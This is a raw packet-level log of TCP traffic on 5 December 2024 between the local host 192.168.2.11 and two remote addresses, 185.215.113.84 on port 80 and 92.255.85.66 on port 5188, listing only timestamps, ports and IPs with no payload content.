Dec 5, 2024 17:32:16.123146057 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.124341965 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.124605894 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.124635935 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.124658108 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.126188993 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.126293898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.126343012 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.127341032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.127435923 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.127484083 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.128282070 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.128328085 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.128551006 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.128591061 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.128669977 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.128920078 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.130295038 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.130306005 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.130338907 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.131215096 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.131341934 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.131758928 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.131798029 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.132323027 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.132457018 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.132518053 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.132550955 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.133503914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.133543968 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.134022951 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.134363890 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.134706974 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.134749889 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.135200024 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.135245085 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.135943890 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.135989904 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.136133909 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.136197090 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.136715889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.136817932 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.136841059 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.136854887 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.137701988 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.137756109 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.137789011 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.137826920 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.138596058 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.138657093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.138669968 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.138709068 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.139590979 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.139642954 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.139736891 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.139776945 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.140717983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.140901089 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.140945911 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.141815901 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.141860962 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.142389059 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.143055916 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.143105984 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.143222094 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.143260002 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.144135952 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.144184113 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.144457102 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.144498110 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.145281076 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.145322084 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.145620108 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.145654917 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.146472931 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.146531105 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.146553040 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.146564007 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.147608995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.147655010 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.148019075 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.148061991 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.148818016 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.148885965 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.148914099 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.148947954 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.149965048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.150013924 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.150449038 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.150490046 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.151415110 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.151472092 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.151536942 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.151581049 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.152523041 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.152584076 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.152756929 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.152806044 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.153512001 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.153563023 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.153578997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.153712034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.154593945 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.154648066 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.154839993 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.155075073 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.155723095 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.155775070 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.156254053 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.156302929 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.156826973 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.156877041 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.156914949 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.156963110 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.157989979 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.158040047 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.158111095 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.158154964 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.159128904 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.159176111 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.161871910 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.162117958 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.162323952 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.162427902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.162617922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.162666082 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.163722038 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.163978100 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.164031982 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.164905071 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.165353060 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.165401936 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.165858030 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.165926933 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.165971041 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.167088985 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.167500973 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.167560101 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.168330908 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.168435097 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.169373989 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.169425964 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.169646978 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.170314074 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.170408010 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.171112061 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.171159029 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.171541929 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.172019958 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.172068119 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.172717094 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.173337936 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.173857927 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.173870087 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.173906088 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.173933029 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.174988031 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.175395966 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.175451994 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.176111937 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.176326036 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.176376104 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.177409887 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.177723885 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.178843021 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.178879023 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.179095030 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.179239035 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.179572105 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.179900885 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.180685997 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.180737972 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.181013107 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.181742907 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.181792974 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.182235003 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.182277918 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.182921886 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.183073044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.183115959 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.184053898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.184602022 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.185220957 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.185235977 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.185270071 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.185296059 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.186352968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.186383963 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.186436892 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.187500954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.188165903 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.188210011 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.188822985 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.189239979 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.189284086 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.189727068 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.191250086 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.191366911 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.191380978 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.191411972 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.191438913 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.192348003 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.192595959 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.192639112 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.193555117 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.193947077 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.194670916 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.194719076 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.194761992 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.195576906 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.195621967 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.195658922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.195694923 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.196561098 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.196751118 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.196800947 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.197715044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.197757959 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.197801113 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.198903084 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.199048996 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.199095011 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.200028896 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.200130939 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.201128006 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.201175928 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.201380968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.202142000 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.202240944 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.202334881 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.202377081 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.203399897 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.203551054 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.203596115 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.204530954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.204643011 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.205705881 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.205759048 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.206010103 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.206104994 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.206793070 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.206986904 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.207036018 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.207964897 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.208046913 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.208096027 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.209114075 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.209208965 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.209758997 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.210298061 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.210454941 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.211373091 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.211419106 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.211575985 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.212613106 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.212661982 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.212717056 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.212758064 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.213630915 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.214109898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.214157104 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.214792013 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.215437889 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.215482950 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.215910912 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.216515064 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.217027903 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.217072010 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.217526913 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.218241930 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.218288898 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.218373060 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.218413115 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.219472885 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.219794989 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.220962048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.221004009 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.221013069 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.221683025 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.221728086 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.266823053 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.266850948 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.266984940 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.267371893 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.267420053 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.267472029 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.267509937 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.268587112 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.268659115 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.268733025 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.269727945 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.269782066 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.269794941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.269829988 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.270878077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.270940065 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.270991087 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.272041082 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.272094965 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.272299051 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.272344112 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.273171902 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.273212910 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.273216009 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.273272038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.274327040 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.274372101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.274420023 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.275371075 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.275424004 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.275474072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.275521040 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.276304960 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.276360989 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.276565075 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.276607990 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.277276039 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.277329922 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.277692080 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.277738094 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.278243065 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.278287888 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.278367043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.278419971 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.279190063 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.279242992 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.279309988 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.279350042 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.280127048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.280767918 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.280818939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.281079054 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.281092882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.281116009 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.281146049 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.281984091 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.282300949 CET	80	49793	185.215.113.84	192.168.2.11
